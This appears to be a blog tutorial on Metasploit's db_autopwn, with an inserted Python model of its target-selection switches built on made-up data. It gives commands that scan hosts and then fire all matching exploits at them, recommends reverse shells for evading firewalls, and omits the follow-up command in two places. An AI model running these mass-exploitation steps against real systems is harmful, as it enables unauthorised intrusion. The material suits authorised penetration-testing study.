[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
The options marked in bold are the ones we will use in this guide. However, option “-r” is also quite useful, as a reverse shell has a higher chance of getting through a firewall once you have successfully exploited a host. You can also use “-q” if you don’t want to see all the module output during autopwn.
First we will look at using db_nmap.
You need to scan the host(s) for open ports so that autopwn knows which ports are open:
db_nmap -sV [IP]
Then you just execute autopwn:
db_autopwn -p -e
Now just watch as the exploits ‘flow’. When they finish, you can check if any of the exploits succeeded by doing:
The other method, which I personally find more effective, is using Nessus to determine the target host’s vulnerabilities beforehand. After a successful scan has finished, go to Reports, select the scan you have just done, and click the “Download report” button. Save it as a .nessus file somewhere on your HDD.
Then in msfconsole do:
db_autopwn -x -e
Once again you will see the flow of exploits (unless you specified the -q option as well). To check if any of the exploits actually worked, once again do:
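As an added illustration (not part of the original post and not Metasploit’s own code), the Python below models how the selection switches listed at the top narrow the (host, module) pairs before anything is launched, i.e. the list that “-t” prints and that is worth reviewing before adding “-e”. The hosts, ports, vulnerability references and module names are all constructed.

```python
import ipaddress, re
from collections import namedtuple

RANKS = ["manual", "low", "average", "normal", "good", "great", "excellent"]
Host = namedtuple("Host", "ip ports refs")        # as db_nmap (ports) / a .nessus import (refs) would store it
Module = namedtuple("Module", "name port rank refs")  # an exploit module: default port, rank, references

def in_ranges(value, spec, parse):
    """True if value lies in any 'a' or 'a-b' element of the comma-separated spec."""
    for part in spec.split(","):
        lo, _, hi = part.partition("-")
        if parse(lo) <= parse(value) <= parse(hi or lo):
            return True
    return False

def select(hosts, modules, by_port=False, by_ref=False, include="", exclude="",
           port_include="", port_exclude="", min_rank="manual", regex=None):
    """Return sorted (ip, module) pairs the switches would match; nothing is run."""
    matched = []
    for h in hosts:
        if include and not in_ranges(h.ip, include, ipaddress.ip_address):   # -I: only these hosts
            continue
        if exclude and in_ranges(h.ip, exclude, ipaddress.ip_address):       # -X: never these hosts
            continue
        if port_include and not any(in_ranges(p, port_include, int) for p in h.ports):  # -PI
            continue
        if port_exclude and any(in_ranges(p, port_exclude, int) for p in h.ports):      # -PX
            continue
        for m in modules:
            if RANKS.index(m.rank) < RANKS.index(min_rank):    # -R: minimum rank
                continue
            if regex and not re.search(regex, m.name):         # -m: name filter
                continue
            if (by_port and m.port in h.ports) or (by_ref and m.refs & h.refs):  # -p / -x
                matched.append((h.ip, m.name))
    return sorted(matched)

HOSTS = [   # constructed sample data, not from a real scan
    Host("10.0.0.5", {22, 80, 445}, {"CVE-0000-0001"}),
    Host("10.0.0.9", {80, 3306}, set()),
    Host("10.0.1.3", {445}, {"CVE-0000-0002"}),
]
MODULES = [  # constructed module names, ports, ranks and references
    Module("exploit/demo/smb_a", 445, "great", {"CVE-0000-0001"}),
    Module("exploit/demo/smb_b", 445, "low", set()),
    Module("exploit/demo/web_c", 80, "normal", {"CVE-0000-0002"}),
]
```

Calling select(HOSTS, MODULES, by_port=True) corresponds to “-p”, and by_ref=True to “-x”; note how “-R normal” drops the low-ranked module and “-X”/“-PX” remove hosts entirely, which is the review a “-t” run gives you before “-e”.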
I will soon post about what can be done once a host has been exploited successfully, along with a guide to using the meterpreter session.